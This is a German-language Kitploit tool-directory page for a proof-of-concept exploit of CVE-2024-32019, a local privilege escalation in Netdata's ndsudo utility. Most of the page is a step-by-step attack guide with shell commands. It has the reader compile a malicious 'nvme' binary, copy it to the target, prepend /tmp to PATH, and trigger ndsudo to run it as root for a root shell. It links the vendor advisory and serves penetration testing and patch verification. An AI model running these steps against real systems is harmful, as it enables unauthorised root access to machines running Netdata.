Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-32019-POC — POC für die netdata ndsudo Sicherheitslücke - CVE-2024-32019 | Kitploit
Tools/GitHubGitHub/azureadtrent/cve-2024-32019-poc
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubazureadtrent/cve-2024-32019-poc

CVE-2024-32019-POC

POC für die netdata ndsudo Sicherheitslücke - CVE-2024-32019

Repository anzeigen
212vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Privilegieneskalation via ndsudo (Netdata Lokaler Exploit)

Dieser POC wird verwendet, um eine verwundbare ndsudo-Dienstprogramm auszunutzen, das mit Netdata gebündelt ist, um lokale Privilegien auf root zu eskalieren. Der Exploit funktioniert, indem eine schädliche Binärdatei in den PATH des Benutzers eingefügt wird, die einen vertrauenswürdigen Befehl (nvme) imitiert und von ndsudo mit root-Privilegien ausgeführt wird.


Voraussetzungen & Annahmen

  • Sie haben lokalen Shell-Zugriff auf dem Zielsystem.

  • Sie können den folgenden Befehl ausführen, aber er schlägt mit einem "not found" oder ähnlichen Fehler fehl:

    root@kitploit:~
    ./ndsudo nvme-list
    

1. Kompilieren der schädlichen Nutzlast

Auf Ihrem Angreifer-Rechner (oder dem verwundbaren System, falls es einen Compiler hat) kompilieren Sie die Binärdatei (z. B. aus der Datei poc.c im Repository):

root@kitploit:~
gcc poc.c -o nvme

Diese Binärdatei sollte so erstellt werden, dass sie eine root-Shell startet oder beliebige Befehle mit root-Privilegien ausführt.


2. Übertragen der Nutzlast auf das Zielsystem

Verschieben oder laden Sie die kompilierte nvme-Binärdatei in ein von Ihrem Benutzer beschreibbares Verzeichnis, z. B. /tmp:

root@kitploit:~
scp nvme user@target:/tmp/
# or use any file upload method you have

3. Vorbereiten der Nutzlast zur Ausführung

Stellen Sie auf dem Zielsystem sicher, dass die Binärdatei ausführbar ist und fügen Sie ihr Verzeichnis Ihrem PATH voran:

root@kitploit:~
chmod +x /tmp/nvme
export PATH=/tmp:$PATH

Dadurch wird sichergestellt, dass ndsudo Ihre schädliche nvme anstelle der legitimen auflöst und ausführt.


4. Auslösen von ndsudo, um Ihre Nutzlast auszuführen

Führen Sie den verwundbaren Befehl aus, um ndsudo auszulösen:

root@kitploit:~
./ndsudo nvme-list

Ressourcen

  • Netdata GitHub Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
Tool herunterladen